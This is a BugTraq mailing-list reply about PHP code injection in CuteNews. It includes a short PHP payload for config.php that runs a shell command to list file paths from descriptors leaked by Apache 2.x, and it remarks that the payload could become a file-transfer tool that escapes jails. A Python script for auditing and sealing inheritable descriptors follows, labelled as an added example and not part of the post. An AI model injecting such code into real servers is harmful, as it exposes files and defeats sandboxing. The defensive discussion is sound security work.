BugTraq
Re: PHP code injection in CuteNews
Feb 28 2003 10:18PM
Steve Grubb (linux_4ever yahoo com)
In-Reply-To: <E18ndJT-000JS2-00 (at) f19.mail (dot) ru [email concealed]>
Hello,
If the CuteNews website is running Apache 2.x, which
leaks descriptors to all kinds of things
http://marc.theaimsgroup.com/?l=vuln-dev&m=104585997219471&w=2
then you can do this:
config.php =
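<html><head><title>File List</title></head>
<body> <?php
// List the descriptors inherited by the spawned shell ($$ is expanded by the shell to its own PID)
$cmd = "/bin/ls -l /proc/$$/fd";
exec($cmd, $dir_listing, $status);
foreach ($dir_listing as $item) {
    // ls -l prints "N -> target"; keep the part after "> "
    $match = preg_split("/> /", $item);
    if (!empty($match[1])) {
        // Print only targets that look like filesystem paths
        if (preg_match("/\//", $match[1])) {
            echo $match[1]; echo "<br>";
        }
    }
}
?> </body></html>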
It doesn't take a lot more to make this a fully
clickable file transfer utility that Sandboxes or Jails
cannot protect against.
-Steve Grubb
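
A defender-side check for the descriptor leak this post relies on, as an added example that is not part of the original post: it lists the descriptors in the current process that are still inheritable (no close-on-exec), which are the ones any program it executes would receive, and can mark them close-on-exec. The function names and the scan range are assumptions made for this example.

```python
import os
import stat

def describe_fd(fd):
    """Return a short "type:target" description for an open descriptor."""
    mode = os.fstat(fd).st_mode
    if stat.S_ISREG(mode):
        kind = "file"
    elif stat.S_ISDIR(mode):
        kind = "dir"
    elif stat.S_ISSOCK(mode):
        kind = "socket"
    elif stat.S_ISFIFO(mode):
        kind = "pipe"
    elif stat.S_ISCHR(mode):
        kind = "chardev"
    else:
        kind = "other"
    # /proc/self/fd names the target on Linux; elsewhere report the type only.
    try:
        target = os.readlink(f"/proc/self/fd/{fd}")
    except OSError:
        target = "?"
    return f"{kind}:{target}"

def inheritable_fds(first=3, limit=1024):
    """Map fd -> description for every open descriptor that survives exec()."""
    leaked = {}
    for fd in range(first, limit):
        try:
            if os.get_inheritable(fd):
                leaked[fd] = describe_fd(fd)
        except OSError:
            continue  # descriptor is not open
    return leaked

def seal_fds(first=3, limit=1024):
    """Set close-on-exec on every inheritable descriptor; return the fds changed."""
    changed = sorted(inheritable_fds(first, limit))
    for fd in changed:
        os.set_inheritable(fd, False)
    return changed

if __name__ == "__main__":
    for fd, desc in inheritable_fds().items():
        print(f"fd {fd} would be inherited by exec'd children: {desc}")
```

A chroot or jail restricts new path lookups, not descriptors that are already open, so the audit has to run in the parent before it executes anything.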
Copyright 2009, SecurityFocus